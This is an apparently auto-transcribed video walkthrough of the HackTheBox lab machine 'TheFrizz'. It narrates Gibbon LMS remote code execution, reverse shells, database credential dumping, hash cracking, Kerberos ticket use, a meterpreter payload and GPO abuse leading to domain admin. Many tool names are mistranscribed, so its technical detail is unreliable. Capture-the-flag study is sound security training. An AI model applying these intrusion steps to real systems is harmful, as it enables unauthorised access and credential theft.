Yo, what's going on, guys? In this video, we're going to be doing TheFrizz from HackTheBox. It's a box written about solid medium. And yeah, let's get on to the video. As always, I'm starting by putting my terminals here. I'm starting pinging the IP address. We'll do a ping count for 3, 4, 10, 10, 11, 60. We do get a response back from the server, some sort of AMAP scan. So do MMISSC for default scripts. SV for numeration, we'll scan the ports on IP. Doing this, I'll do my Z verbose. We have a couple ports open, 139, port 22, SSH, 445, port 80, 135, 53 for DNS. I'm going to start by visiting the IP address for 10.10.11.60. Here we do get a WES for, does seem like this is going to be a school page here. Doesn't seem like we do have anything. I'm going to control the source code. And we don't have anything under here. I'm going to start by doing some more erasure, running a GoBuster. So the GoBuster dir mode -u into the IP address will -w. We take off this /home. We'll do -w first user share word list. Dir buster directory list with your medium.txt. We'll do extends HTML, TXT, and also PHP. Here we do have a .html, a /home, which we did. This is the main home page for the document root, and also a gibbon-lms. I'll visit this gibbon lms. We have a login here. I'm gonna try this for like admin pass. And we just get an incorrect username and password. So here we have a Gibbon version 25.0.00. I'm gonna copy this. I'll just copy Gibbon and see if we do have an exploit for Gibbon. So I'll do exploit for like GitHub. We'll check for like a RC. We do have a CV 2023 45878 for RCE. So here they generate a TCP reverse shell, basically just having the listener on getting the payload back, reverse shell back on using a payload from MS, or using MSF Venom, right? On 10.10.11.60. I like using a different type of, I'm searching it up. I like using a GitHub RC from a different creator. From a different GitHub repository. Let me see if I can find it. We don't have... I think it's by Killer CD. So I'm going to git clone this repository here. Click on terminals here. I'll do a git clone. CD into CVE. We'll do a Python 3 for CV. It is asking for a -URL, so do -h, and just asking for that Gibbon URL. So we'll take off this -h, we'll take off this index.php as well, and we got a shell under, you'll see that does generate the .php for cmd is equal to who am I, and now we are under frizz. So I'm going to go to my HTTP here, I'll just go open burp sweep. Go to OK, go to next, go to start burp. So I'm going to go to my proxy, go to proxy settings. We'll do this for 10.10.15.68 for my IP address. Go to intercept on, press it on that. Put this into repeater. We send that. And now we're under w.web service. Under here, if I do a dir, you'll see that I do get all the files in here. So once we are under a custom made, or not custom made, but an application's already made for like a CMS or LMS, or for any type of application that's already pre-built and just ready to install. Or for given LMS, usually we have like a config.php, or for like WordPress, we have like a wp-config.php. Any config file, we can see if we can get that config.php. So I'll just do a type since we are on Windows for config.php. We'll do Ctrl-U, we send that. And now we do have we have the configuration file for this Gibbon LMS, which is probably most likely going to be associated with the database. So I'm going to copy this, put this into my text editor. Database server for localhost, Mr. Gibbon DB. Database password, Miss Gibbs pair 21 or 1, and database name for Gibbon. So I'll just send this one more time. So I'm gonna get a reverse shell. So I'll go to rev shells. Turn off my proxy, go to reverse shell generator. I will be getting my IP address. So do ifconfig for 10.10.15.68. 9001, we'll do this for Windows. And I like using a PowerShell number 2 since it does directly execute a PowerShell command. We'll send this one more time, make sure that we can execute commands. We'll do a control U to run code it. I'll start my listeners, so I'll do all rep, netcat my sound VP on 9001. What you send it. You do dir. Who am I? The control L, who am I? And now we're under Frizz. Yeah, so we're able to get a shell through the CV, which is basically allowing us to execute commands using this killer CD from this user. Looking at this .py, basically just using the image path, specifying the file path for this .php. Payload file. This payload file is going to be using this saving as a .php and allowing us to get a request through executing the payload file for this parameter for CMD. And it's basically just using that main payload for image path and also this given person ID. If we try to view this, I think this should be base 64. So do control C. So we'll echo this out for base 64 minus D. And this is just going to be an ecosystem for get parameter for CMD. And that probably explains why we have this parameter for CMD is equal to who am I, since all we do have is under that .php file. For the headers, just going to be executing a system CMD get parameter back so you can get commands back from the server. And now we're under Frizz. So looking back at our leaf pad, we did have a database password and also a username. So I'm going to be using MySQL. Oh man, let's go back so we can actually, I believe we did have the config.php. We'll just copy this one more time since I accidentally deleted it. And we do have that password for MySQL. So I'm going to go back. I'm going to start by looking for the binary. So we'll go into, we have temp source. We'll go into MySQL. We should have a bin directory in here for the binaries. So I'll do -u, or let's do MySQL. MySQL -u for, for the name. It's going to be for given. -p for that password. I'll put this together just to make sure, since this is a password, and it will do a -e so we can execute. So I'm just going to show databases. I guess, or this is the database name. Let's do the database username for given DB. With the password, we can do show databases. We have a database for given information schema and for test. So we're going to use the database for given, and we'll do a show tables. So we can list the tables within the database. And now we have all the tables within the database. So for given, we don't have a like users or default like users, or we can't do like a select star from users, but we should have a person under here for given person. So we have a given person here for, it's going to be under for users, and this is how it's structured. So you can use given, and we can now select since we know all the tables, we can select star from given person. And we have everything for the users that are registered for within this database. So here we have a hash followed by a salt. So usually given, most databases do have the hash specified first, and also secondly, the salt. Some other databases will have the salt followed by the database or followed by the hash. In this case, we'll just follow the sequence from hash to salt. And we have Frizzle Friona. And this is going to be the username for Frizzle. So we can double check this using Kerberoot. Before continuing, let's download Kerberoot so we can check that this user is valid on the system. And we can also double check within the user directory as well, but we'll just have this for future reference, so we can simply download this and put this into like a users.txt. So we'll just we'll copy link. We'll make a directory for Kerberoot. What do we get? We'll do a chmod +x for Kerberoot. And now we have Kerberoot installed. Looking back, we can do simple user enumeration to check if we have. So we can do user enumeration. We'll specify the domain. I do have this under my /etc host. So we'll cat the /etc host. We can just do like Frizz. We have domain controller and also domain. So we'll do domain for as it for frizz.htb. And also a -- domain controller. We'll specify frizzDC.frizzHTB. And we'll do Control-Shift-O. We go into users.txt. And that user was going to be ffrizzle at frizz.htb. So you have that users. And we have the valid username as f.frizzle. So now we can run some attacks on for this user for Frizzle. Doing that, we do have the hash followed by the salt. So I'm going to put this into a hash.txt. Hash.txt. We'll do a semicolon. It's going to be a / for the salt. And we can use the hashcat to let me make sure that this was make sure this was the C4. And now we have the hash. We can right quit, cat this hash.txt, and we have the hash followed by the salt. So I'm gonna use hashcat. We'll do this for 10, I believe it's 1024 for hash.txt. For user share word list, rocky.txt. We don't have a hash.txt. I believe it was 2410, I think. We'll try this for 1420. We can do a -- show. And now we have that password for f.frizzy or frizzle, f.frizzle. We'll do password followed by that password for this specific user. So now, since we do have a valid user, we have a valid password now for since we did crack the password for f.frizzle. I'm gonna use an evil winrm. We'll do it evil winrm for 10 10 11 60 -u for f. We don't need special quotations, but it's always easier to do that. We'll do -p for the password. And seems about right. You press it on that. And most likely this is not going to work since it's not logging into f.frizzle. Okay, so since we can't get a since we can't authenticate with EvilWinRM, we do have port 22 open for SSH, which I did see for SSH. Port 22 open for SSH. We can use Kubernetes. However, we need a ticket for that. So I'm gonna do a npacket for get.tgg. We'll do a get.tgg for we'll do frizz.htb for the user. So in this case, we have a f.frizzle, and then we can specify the, I believe, semicolon for the password. Also specify the semicolon for the password. Domain controller -IP for 10.10.11.60. So now we have the ticket for, I'm gonna make dir for a ticket so we can keep this everything organized for like all the tickets and hashes and all that. So we'll copy the f.frizzle into ticket, cd into ticket. And now we need to specify the environment variable. There we go. So now we have this KRB5 CC name. So this will allow us to set the ticket. So I usually just export the ticket. Specify import f.frizzle. We do have, I believe we can use EvilWinRM. If EvilWinRM does not work, we'll specify again for SSH. We can use the -k option to log it successfully through f.frizzle. So do 10.10.11.60 -r for frizz. Let's check. I guess we can just use a frizz.htb for and -k. And it doesn't seem to work. So I'm gonna do SSH into f.frizzle. We'll do S for 10.10.11.60. We'll do -k. And since we have this specified within the environment variable, we should be able to get a shell as f.frizzle using her ticket. We do dir. We can clear terminals. We do who am I. Also do have auto tab. So you have who am I. And now we're under f.frizzle. So I'm gonna start doing some enumeration. I'm gonna go back. Actually, let's go into f.frizzle. We have a desktop here, which our user.txt should be in here. Just type this user.txt under there. We do dir, go back. If I do a dir for, if I just press tab, you'll see a bunch of hidden files that we do have. I want to start by checking for this, for this recycle bin. If we do dir, or the cd into recycle bin, we do dir. We can't do anything if we do -force. This will force to list all the files within that directory. I'm going to cd into the directory. We do dir. And now we have a total of 2 files for these 7z files. So I'm guessing these files are going to be deleted. We don't have like Python 2, or if we do like where for Python 3, we don't have any of these executables on the server. So I'm going to search up for, we'll do MSF Venom for interpreter Windows. We'll search up for interpreter. And we can use a, here we go. We have some commands here for Windows. So let's reverse shell TCP. let's go to this medium. So you can find a interpreter reverse TCP. This is the one I like using. So we can just copy this. The reason I like using is because of the payload, and we don't have any other type of extensions or payloads with using that. Because the other one I believe has like x86 or something like that. So I don't like using that, but we'll do Control Shift O. We'll just exile here. We don't need this. We'll make a directory for payload. We'll cd into payload. I'll just name this for execute exe. We'll do this on port 9001. Set my IP address for 10.10. We'll do Control Shift O for ifconfig for 10.10.15.68. And now we have that exe, which is going to be outputted for the file type, and then outputting it to .exe. I'm not sure why that KRB environment is not supported, but let me run this one more time. Yeah, I'm not sure why that's running or giving us a warning, but now we have our execute.exe. So we'll do a Python 3 -http.server on port 8021. Number of terminals here, I'll do the curl HTTP. I do have already for my IP address 10.10.15. 1568 for port 8081. We'll get this execute.exe, and we'll put it to execute.exe. Press it on that. We do dir, and now we have our execute.exe. So I'm gonna start up a MSF console so we can get that multi-handler. So we can download these files for this 7Z, or for this IE, and also this RE. So I'll use a exploit multi-handler. Show options, we'll set the host to 10.10.10.15.68, and we'll set the port to 9001, and also set the payload. The payload was the payload for reverse _ TCP. We'll run this. We'll execute.exe. You should get an interpreter session open. And we do, so if I do like a sysinfo, you'll see that we're under the freeze or the TheFrizz DC. This is a x86 for Windows. So if I do dir, you'll see all the commands that we can do. I'm not sure what under directory I'm under, so I do Control Shift O. We are under this payload, which we can just put it on here. I usually like running MSF Venom or MSF console under like a downloads directory, so I can just simply download it, because it's a hassle if I want to download the 7Z and specifying the full path. I'm going to get a bunch of errors with using the download method for specifying the file and then specifying it to a full path under my local machine. And it just causes a lot of headache with that. So I usually just use like the dot for downloading it to my simple directory that MSF console was ran under. So I can press tab. We'll do this for $IE, and I just press enter on that. If we go back, this will be under that. We have that file for that .7z, and we'll go back up. We can do the download again for that $R to this directory. And this should be downloading that file from the remote server to our server. So you see that's under payload, so it is specified under /payload. So we do ls -a, and now we do have that 7z. So we do have this file here, so I'll do 7z for extract for this file. We do have an error, we'll do 7z Again, we'll extract it for this $R. Let me just copy this file. It's not extracting. We'll specify a backslash for that, and that should disregard all errors for extracting that. So now we have a directory for it, or WAPT, and we have a lot of files in here. So the first place I like looking is going to be under /conf. I like looking for configuration files. Sometimes also for like these Windows machines, you're looking into like INI or like default how do you say, environment variables that are specified within during the installation of any like MySQL or something. So you'll see that these are default environment variables, and sometimes they contain secrets and credentials. So we have a WAPT password, and I'm guessing it's going to be B64, just since we did the equal sign at the end, and we have a password as this. So we'll do password for that, and we have a token secret, the root directory, and we have everything for that. So I'm guessing it's going to be for the user for m.school. Let's check under, let's go back. We'll do dir, we'll cd into m.schoolbus. Sum of vi into users, just to confirm that this is a valid user. We do have m.school or m.schoolbus TheFrizz.htb. So we do have those valid users on the box. So we already got the password for f.frizzle, or it was f.frizzle, v.frizzle. We'll check for this for another user for m.school, school bus, since we can't. We were already under for web service. So we'll do this for m.schoolbus. So we'll start by doing that. I'm gonna go under /ticket, which we are under /ticket already. We'll get a was it impact get TGT. We'll do this for a m.schoolbus. m.schoolbus for his specific password. We put this into leaf pad. Domain controller for 10.10.11.60. We can export instead of f.frizzle, we'll do this for m.schoolbus. And I'll do the same thing for evil_winrm. We'll do evil_winrm for -i for 10.10.11.60 -r for frizz.htb, and then -k for the ticket. And we do get the same thing or the same error for frizzle. So I'll do SSH into I believe it was we use SSH into f.frizzle. Instead of f.frizzle, we'll do the same thing for m.schoolbus. 10.10.11, press it on that. And we're able to log in successfully. So while that is loading, yeah, we're under if I do who am I, we'll see that we're under school bus. So successfully we're able to get that we're able to get a shell under there and also have his password. That which was base64 encoded. So I'm gonna go back. I'll just make a directory for hound, cd into hound. I want to start by using bloodhound or bloodhound python. This will allow me to generate if I do mice help. This will allow me to generate a .zip file, so we can import it into bloodhound. So we'll do -u for the user. The user was m.schoolbus. -p. We'll see, we need to specify the password. I'll specify the name server for 10, 10, 11. I'm not sure if this is asking for, we'll just do this for TheFrizz HTTP. TheFrizz HTTP, we'll do minus the domain controller for the domain controller for TheFrizz DC. And then we'll specify, seems about it, DC name server. We're not using Kubernetes for that. We could, but we're not going to be using Kubernetes for any cache file as well. And then I think specify domain controller IP. We don't have a domain controller IP under here. We do have a -d. So frizz.htb, we'll do -c or -c for all. We'll do -myzip for what's it on that. Press it on that. I guess the name server would be, let's check this for 10, 10, 11, 60. Okay, there we go. So I'm not too sure. I guess it's because the name server, I put the host. So I guess it is asking for the direct IP address. Yeah, so we can just leave that there. So now we have this, I'll put it to a bloodhound.zip. Let's go into a /opt, or we'll do a docker compose to /opt bloodhound. We can start up our bloodhound. This is hosted on port 8081 or port 8080 for bloodhound. It should be port 8080. There you go. So I'll go to administration. We'll go to database management. I want to delete everything for other environment data. Go to download collectors or administration. Go to upload files. And we'll select our .zip, and this will import everything that was enumerated during when we did log in as as the user for m.schoolbus. So right now it's ingesting, and once this is complete, we should be able to go to explore and investigate what privileges or outbound objects we do have for the user for m.school, or as well as for frizzle or f.frizzle. This was canceled. Let's do this one more time. So after a while, we do have the status complete for the zip file that we did upload. We did have the user as school bus, so I'm going to check for school bus at TheFrizz HTTP. We'll see if we do have any outbound objects for this user, and we do have a couple. So we'll just check for these, since these are just owns. We can write a GP link to domain controllers, so that's pretty interesting. We can go to Windows abuse. And reading the general concept, we have m.school. It has the permissions to modify the GP link. And we can apply a malicious group policy object. And so this is going to basically be GPO abuse. So I'll search those up. So do GPO abuse. Anytime for like Windows, I like using Medium. Like for the website for Medium. Any of these are like really good because it's simple and it gets straight to the point. You don't. It's not like other how do you say, like hack tricks, or hack tricks are good. Don't get me wrong. Those are, or like the other websites are used for like pen testing, but some of these are pretty direct. So I can just like simply understand what's going on and understand the commands that are needed for to do the pervisk. So here I already see that they're using a sharp GPO abuse.exe. So let's see if we can get this .exe file. I want to get a precompiled executable, so we don't execute. So we don't have to execute this within like a text editor and then compile everything within the GitHub repository. We'll go into releases. Now we have this sharp GPO onto my machine. So I'll do Control Shift O. We'll just do Control D. We can exile this. We don't need any of this. So I'll do mkdir for payload 2. Oops. It's actually remove 2. Put this into 2 directories, but move payload into payload 2. Seed into payload 2. We can get this sharp GPO abuse exe. So I know a little bit about this GPO. I know we have to create a new GPO for to create a new local admin. So you'll see that they use the GPO or get GPO for the policy. So let's start doing that. So we can start by creating, before transferring this sharp GPO abuse, I'll do Control Shift O or Control Shift L. I'm not too sure why. Okay, so I'm gonna try to SSH, which I already did. I think someone did reset the machine. So I'm gonna do this one more time for the user for m.schoolbus. Specifying his password one more time so we can get the new for his new ticket, so we can get a new ticket. Press it on that. Let me just remove, I know I did overwrite, but just to make sure we have his ticket, right? We'll press it on that. And now for some reason I can't log in with this. Let me export the press it on that one more time. And now we're able to log in. So with this machine, for some reason, you might get some errors with trying to SSH. I don't know. I tried resetting the machine and then after it did work. So I'm not sure if the machine resets. Sometimes it works, sometimes it doesn't. I don't know. Even if you just export it, even if you do export the environment variable for the ticket directly, sometimes it will not work and sometimes it will, but trying my luck, this time it does work. So now I'm going to do a, so the tab is pretty slow here, but I'm going to get a new dash GPO. So I'll create a new GPO. It's pretty laggy, but I also create a name for that. The name will be, this can be anything, whatever you want. I'm just going to name this new GPO since we can just create any type of name. Put this into quotation marks. This will create a new GPO for new GPO. Let's go back. And now we see that we have the ID as well as the display name for new GPO. We can specify the OU for domain controllers. Domain controllers. we'll specify DC for the domain controller, which is equal to frizz. DC is equal to HTTP. So OU for domain controller, DC for frizz, and DC for HTTP. And we'll put this for linked enabled for yes. This for link enabled, yes. Specify the new GPO, make sure we have the name correct. Doesn't seem like it was. We'll create this new. Minus target name, link enabled. I'm not. Is it not? Let me see if I can get this is 5 for all. Domain. Yeah, we do have this for new GPO. So after a while, I did try a couple commands here. I was able to get this to work. I'm not sure why it's not working. I did specify the OU and also the DC and also the DC for HTTP. But it was saying that this was not recognized, or the name new GPO wasn't recognized, but it was created for a new GPO. So we are under school bus. I want to start a Python server, so I'm just gonna close this out. We'll do Control-Shift-O. Let's go back into payload. Payload 2. We do have the sharp GPO, so do Python 3. For ADD1, let's get this. Let's get my IP address. 10.10.15.68. So do curl HTTP for 10.10.15.68 port 8021 for this sharp. We do get a hit. We do dir. And now we do have this sharp GPO. So I'm going to go back to that medium page again. I'm going to be using a -- add local admin user account, which is going to be for school bus. So im.school bus. And with the GPO name for new GPO. Do we not have? Let's create a new GPO. So I'll create a new dash GPO. We'll do this for testing. And then we'll do the same thing for new GP. Now we have the same thing for name. Testing. We have the GPO ID now, so that should work now. We do this for testing. Now it was modified. I'm not sure why it has to do with the name or how I created it in the sequence, but I just create a new one for testing. Create the new GPO link for testing the target for make sure the GPO is specified with the domain controller for the group, and then it does work now. Going back, we can do a GP updates. We can do force. We can see our current user, and then they do run a net local group administrators. And I'll do the same thing as what they're doing. So this will update the policy. And they do run the net local group. and we are under administrator. So we can do administrator, m.schoolbus. If we go for, let's do dir, let's go to let's go to administrator, go dir mode. We don't have access to administrator. So now since we are under administrator, we can run any type of binary like a exe. I'm going to be using ps exec. This will allow me to runmpacket. So I'll do an packet for ps exec, and we can get system administrator with that. So do a no-pass. A no-pass for frizz.htb for m.school. We don't have to do a capitalize, but we can do a m.schoolbus at frizz.htb or frizz.dc.frizz.htb. And press it on that. We don't have the. Did we not export it? Let's go under. We're not under the right file, so let's go into ticket. Let me get this file one more time for export. So we export it. We have our ticket under here. Now we can use the ps exec. We do a -k for Kubernetes. We don't have a pass, but we do have a ticket for m.school. But now that checking the local administrator, or if we check for net local groups, admit we are under the local group for administrators for m.schoolbus. So we'll go back into the cache, press it on that. This will upload the file, run it, and we should be under system32. So you can go back, dirt mode. Let me just X out of here. So go to users, dir mode. Now we'll see if we can go into administrator. So go into administrator, do dir mode. Desktop, dir mode. We can clear terminals here. Can't clear terminals, but we can just type our root.txt. Well, guys, pretty much in the video. Don't like and subscribe, and I'll catch you guys in the next one.